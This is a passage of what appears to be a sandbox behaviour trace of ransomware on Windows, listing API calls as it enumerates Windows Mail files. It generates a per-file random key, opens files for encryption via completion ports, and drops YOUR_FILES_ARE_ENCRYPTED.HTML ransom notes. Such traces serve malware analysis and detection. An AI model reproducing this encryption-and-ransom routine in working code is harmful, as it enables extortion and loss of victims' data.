(lpString=".log") returned 4 [0163.617] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0163.617] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0163.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0163.618] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=2097152) returned 1 [0163.618] GetProcessHeap () returned 0x270000 [0163.618] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0163.619] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="22") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="A7") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="C0") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="7E") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="78") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="2B") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="11") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="B7") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="59") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="85") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="FF") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="0E") returned 2 [0163.619] 
wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="34") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="03") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="4D") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="8E") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="12") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="15") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="4D") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="18") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="01") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="A6") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="CB") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="19") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="1B") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="9B") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="3C") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="DB") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="10") returned 2 [0163.620] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="37") returned 2 [0163.620] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="AA") returned 2 [0163.620] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="19") returned 2 [0163.620] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" [0163.620] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.620] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0163.620] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2559610, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2559610, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x827deb8e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x206000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.MSMessageStore", cAlternateFileName="WINDOW~1.MSM")) returned 1 [0163.620] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore") returned 98 [0163.620] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.620] PathFindExtensionW (pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0163.620] lstrlenW (lpString=".MSMessageStore") returned 15 [0163.620] PathFindExtensionW (pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0163.620] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2559610, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2559610, ftLastAccessTime.dwHighDateTime=0x1d70517, 
ftLastWriteTime.dwLowDateTime=0x82d13bb7, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 1 [0163.620] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat") returned 87 [0163.621] lstrcmpW (lpString1="WindowsMail.pat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.621] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0163.621] lstrlenW (lpString=".pat") returned 4 [0163.621] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0163.621] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2559610, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2559610, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82d13bb7, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 0 [0163.621] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0163.621] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0163.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\backup\\old\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, 
hTemplateFile=0x0) returned 0x5b8 [0163.626] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0163.653] CloseHandle (hObject=0x5b8) returned 1 [0163.654] GetProcessHeap () returned 0x270000 [0163.655] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0163.655] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="old", cAlternateFileName="")) returned 0 [0163.655] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.655] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0163.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\backup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.655] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.658] CloseHandle (hObject=0x58c) returned 
1 [0163.658] GetProcessHeap () returned 0x270000 [0163.659] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.659] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25334b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25334b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd49a6590, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0163.659] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 68 [0163.659] lstrcmpW (lpString1="edb.chk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.659] PathFindExtensionW (pszPath="edb.chk") returned=".chk" [0163.659] lstrlenW (lpString=".chk") returned 4 [0163.659] PathFindExtensionW (pszPath="edb.chk") returned=".chk" [0163.659] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25334b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25334b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd49a6590, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edb.log", cAlternateFileName="")) returned 1 [0163.659] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 68 [0163.659] lstrcmpW (lpString1="edb.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.659] PathFindExtensionW (pszPath="edb.log") 
returned=".log" [0163.659] lstrlenW (lpString=".log") returned 4 [0163.659] PathFindExtensionW (pszPath="edb.log") returned=".log" [0163.659] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0163.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\edb.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0163.660] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=2097152) returned 1 [0163.660] GetProcessHeap () returned 0x270000 [0163.660] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0163.661] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="82") returned 2 [0163.661] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="33") returned 2 [0163.661] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="33") returned 2 [0163.661] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="C4") returned 2 [0163.661] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="72") returned 2 [0163.661] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="BB") returned 2 [0163.661] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="48") returned 2 [0163.661] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="A0") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="AB") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="00") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="8F") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="D1") returned 2 [0163.662] 
wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="28") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="6A") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="19") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="9B") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="C8") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="6E") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="23") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="BC") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="D9") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="BF") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="52") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="17") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="69") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="5A") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="D4") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="CD") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="57") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="AC") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="77") returned 2 [0163.662] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="24") returned 2 [0163.663] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" [0163.663] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.663] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0163.663] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25334b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25334b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8287710f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edb00001.log", cAlternateFileName="")) returned 1 [0163.663] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 73 [0163.663] lstrcmpW (lpString1="edb00001.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.663] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0163.663] lstrlenW (lpString=".log") returned 4 [0163.663] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0163.663] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0163.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 
0x58c [0163.710] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=2097152) returned 1 [0163.710] GetProcessHeap () returned 0x270000 [0163.710] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0163.711] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="32") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="74") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="C0") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="43") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="44") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="A8") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="E4") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="4B") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="BE") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="73") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="FF") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="E9") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="09") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="82") returned 2 [0163.711] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="85") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="31") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="FB") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="6F") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="62") 
returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="F7") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="55") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="42") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="C8") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="20") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="7A") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="7D") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="A5") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="44") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="04") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="81") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="2A") returned 2 [0163.712] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="69") returned 2 [0163.713] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" [0163.713] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.713] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0163.715] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0xd250d350, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd250d350, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x81d74b3a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edbres00001.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1 [0163.715] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 76 [0163.715] lstrcmpW (lpString1="edbres00001.jrs", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.715] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0163.715] lstrlenW (lpString=".jrs") returned 4 [0163.715] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0163.715] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x81f89e7e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edbres00002.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1 [0163.715] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 76 [0163.717] lstrcmpW (lpString1="edbres00002.jrs", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.717] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0163.717] lstrlenW (lpString=".jrs") returned 4 [0163.717] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0163.717] FindNextFileW (in: hFindFile=0x42f3200, 
lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x859db9ea, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x0, dwReserved1=0x60, cFileName="oeold.xml", cAlternateFileName="")) returned 1 [0163.717] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 70 [0163.717] lstrcmpW (lpString1="oeold.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.717] PathFindExtensionW (pszPath="oeold.xml") returned=".xml" [0163.717] lstrlenW (lpString=".xml") returned 4 [0163.717] PathFindExtensionW (pszPath="oeold.xml") returned=".xml" [0163.717] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0163.717] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0163.755] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=260) returned 1 [0163.755] CloseHandle (hObject=0x58c) returned 1 [0163.756] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd263de50, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x85b0c4ec, 